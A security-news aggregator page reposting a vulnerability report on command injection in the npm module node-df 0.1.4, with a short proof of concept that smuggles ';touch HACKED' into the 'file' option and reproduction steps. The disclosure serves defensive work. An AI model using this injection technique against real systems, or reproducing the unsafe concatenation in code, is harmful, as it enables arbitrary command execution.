logo
 
  1. Reverse Engineering >
  2. Exploits >
  3. Node.js third-party modules: [node-df] RCE via insecure command concatenation


ArabicEnglishFrenchGermanGreekItalianJapaneseKoreanPersianPolishPortugueseRussianSpanishTurkishVietnamese

Node.js third-party modules: [node-df] RCE via insecure command concatenation


Exploits vom | Direktlink: vulners.com Nachrichten Bewertung


image
I would like to report a RCE issue in the node-df module. It allows to execute arbitrary commands remotely inside the victim's PC Module module name: node-df version: 0.1.4 npm page: https://www.npmjs.com/package/node-df Module Description node-df (abbreviation of disk free) is a cross-platform Node.js wrapper around the standard Unix computer program, df. Module Stats [N/A] downloads in the last day [3,023] downloads in the last week [N/A] downloads in the last month Vulnerability Description The issue occurs because a user input is concatenated inside a command that will be executed without any check. The issue arises here: Steps To Reproduce: Create the following PoC file: ```js // poc.js var df = require('node-df'); var options = { file: '/;touch HACKED', prefixMultiplier: 'GB', isDisplayPrefixMultiplier: true, precision: 2 }; df(options, function (error, response) { if (error) { throw error; } console.log(JSON.stringify(response, null, 2)); }); ``` 1. Execute the following commands in terminal: bash npm i node-df # Install affected module ls # Make sure there isn't any *HACKED* file node poc.js # Run the PoC ls # The *HACKED* file has been created 1. The HACKED file will be created {F594172} Patch Don't concatenate commands using insecure user's inputs :) Supporting Material/References: [OPERATING SYSTEM VERSION]: Kali Linux [NODEJS VERSION]: 10.16.3 [NPM VERSION]: 6.0.9 Wrap up I contacted the maintainer to let them......

https://vulners.com/hackerone/H1:703412?utm_source=rss&utm_medium=rss&utm_campaign=rss

Externe Webseite mit kompletten Inhalt öffnen

➤ Ähnliche Beiträge

  • 1.

    The May 2019 Security Update Review

    vom 352.07 Punkte ic_school_black_18dp
    May is here and so are the scheduled security patches from Microsoft and Adobe. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month.   Adobe Patches for May 2019 This month, Ad
  • 2.

    The February 2019 Security Update Review

    vom 293.14 Punkte ic_school_black_18dp
    February is here and with it comes the latest in security offerings from Adobe and Microsoft. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month. Adobe Patches for February 2019
  • 3.

    The February 2019 Security Update Review

    vom 293.14 Punkte ic_school_black_18dp
    February is here and with it comes the latest in security offerings from Adobe and Microsoft. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month. Adobe Patches for February 2019
  • 4.

    The August 2019 Security Update Review

    vom 284.67 Punkte ic_school_black_18dp
    August is here and it brings with it the scheduled security patches from Microsoft and Adobe. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month.   Adobe Patches for August 2019 Adobe relea
  • 5.

    The July 2019 Security Update Review

    vom 264.9 Punkte ic_school_black_18dp
    July has arrived and so have the scheduled security patches from Microsoft and Adobe. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month. Adobe Patches for July 2019 Adobe release
  • 6.

    The June 2019 Security Update Review

    vom 248.57 Punkte ic_school_black_18dp
    June has arrived and so have the scheduled security patches from Microsoft and Adobe. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month. Adobe Patches for June 2019 This month, A
  • 7.

    Venom - A Multi-hop Proxy For Penetration Testers

    vom 243.52 Punkte ic_school_black_18dp
    Venom is a multi-hop proxy tool developed for penetration testers using Go. You can use venom to easily proxy network traffic to a multi-layer intranet, and easily manage intranet nodes.Features network topology multi-hop socks5 proxy multi-hop port forward port r
  • 8.

    The November 2018 Security Update Review

    vom 240.96 Punkte ic_school_black_18dp
    November is here and with it comes the latest in security offerings from Adobe and Microsoft. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month. Adobe Patches for November 2018
  • 9.

    grapheneX - Automated System Hardening Framework

    vom 234.8 Punkte ic_school_black_18dp
    grapheneXIn computing, hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle a single-function system is more secure than a multipurpose one. Red
  • 10.

    Scanner-Cli - A Project Security/Vulnerability/Risk Scanning Tool

    vom 218.68 Punkte ic_school_black_18dp
    The Hawkeye scanner-cli is a project security, vulnerability and general risk highlighting tool. It is meant to be integrated into your pre-commit hooks and your pipelines.Running and configuring the scannerThe Hawkeye scanner-cli assumes that your dir
  • 11.

    The September 2019 Security Update Review

    vom 205.5 Punkte ic_school_black_18dp
    September is upon us and with it brings the latest security patches from Microsoft and Adobe. Take a break from your regularly scheduled activities and join us as we review the details for security patches for this month.   Adobe Patches for September 2019 Adobe ha
  • 12.

    Jok3R - Network And Web Pentest Framework

    vom 194.11 Punkte ic_school_black_18dp
    Jok3r is a Python3 CLI application which is aimed at helping penetration testers for network infrastructure and web black-box security tests.Its main goal is to save time on everything that can be automated during network/web pentest in order to enjoy more

Kommentare ber Node.js third-party modules: [node-df] RCE via insecure command concatenation